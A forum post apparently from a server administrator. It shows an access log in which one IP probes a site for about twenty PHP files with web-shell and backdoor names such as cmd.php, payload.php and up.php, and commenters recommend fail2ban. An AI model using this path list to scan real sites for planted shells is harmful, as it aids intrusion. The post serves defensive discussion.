36.248.211.71 - - [10/Mar/2020:19:43:59 +0100] "GET /composers.php HTTP/1.1" 502 584 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
36.248.211.71 - - [10/Mar/2020:19:44:00 +0100] "GET /izom.php HTTP/1.1" 502 584 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
36.248.211.71 - - [10/Mar/2020:19:44:02 +0100] "GET /composer.php HTTP/1.1" 502 584 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
36.248.211.71 - - [10/Mar/2020:19:44:02 +0100] "GET /hue2.php HTTP/1.1" 502 584 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
36.248.211.71 - - [10/Mar/2020:19:44:03 +0100] "GET /Drupal.php HTTP/1.1" 502 584 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
36.248.211.71 - - [10/Mar/2020:19:44:05 +0100] "GET /lang.php?f=1 HTTP/1.1" 502 584 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
36.248.211.71 - - [10/Mar/2020:19:44:06 +0100] "GET /izom.php HTTP/1.1" 502 584 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
36.248.211.71 - - [10/Mar/2020:19:44:08 +0100] "GET /payload.php HTTP/1.1" 502 584 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
36.248.211.71 - - [10/Mar/2020:19:44:08 +0100] "GET /new_license.php HTTP/1.1" 502 584 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
36.248.211.71 - - [10/Mar/2020:19:44:08 +0100] "GET /images/!.php HTTP/1.1" 502 584 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
36.248.211.71 - - [10/Mar/2020:19:44:09 +0100] "GET /images/vuln.php HTTP/1.1" 502 584 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
36.248.211.71 - - [10/Mar/2020:19:44:09 +0100] "GET /hd.php HTTP/1.1" 502 584 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
36.248.211.71 - - [10/Mar/2020:19:44:09 +0100] "GET /images/up.php HTTP/1.1" 502 584 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
36.248.211.71 - - [10/Mar/2020:19:44:10 +0100] "GET /images/attari.php HTTP/1.1" 502 584 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
36.248.211.71 - - [10/Mar/2020:19:44:10 +0100] "GET /images/jsspwneed.php HTTP/1.1" 502 584 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
36.248.211.71 - - [10/Mar/2020:19:44:11 +0100] "GET /images/stories/cmd.php HTTP/1.1" 502 584 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
36.248.211.71 - - [10/Mar/2020:19:44:11 +0100] "GET /images/stories/filemga.php?ssp=RfVbHu HTTP/1.1" 502 584 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
36.248.211.71 - - [10/Mar/2020:19:44:12 +0100] "GET /up.php HTTP/1.1" 502 584 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
```

Comment: This is not the right place. Most contributors to this site get hundreds of hack attempts every day, from as many IP addresses. You can post your logs to [online databases](https://serverfault.com/q/1003745/530633), but this will not stop the attempts. You should protect your site from them (e.g. [fail2ban](https://www.fail2ban.org/wiki/index.php/Main_Page)).

Comment: Thank you. I didn't know fail2ban is an active program like that. But, if there is a public area or forum where such varied lists could be posted then developers of all kinds of different programs could check those, to see whether their CMS or webapp happens to have a vulnerability. I wouldn't contact individual developers as a server admin, a) because idk what is targeted b) it seems like a 1000 different apps are targeted.

Comment: Otherwise I can create a Gihub repo for this purpose [here](https://github.com). (By the way, [doesn't adding a great many firewall rules significantly slow down the server?](https://serverfault.com/questions/479549/how-many-rules-can-iptables-support))

Comment: Those apps are not really vulnerable. The purpose of the scan is to: 1. check which apps are available, 2. find obvious configuration errors (like leaving the `setup.php` files after installation or not protecting the configuration files).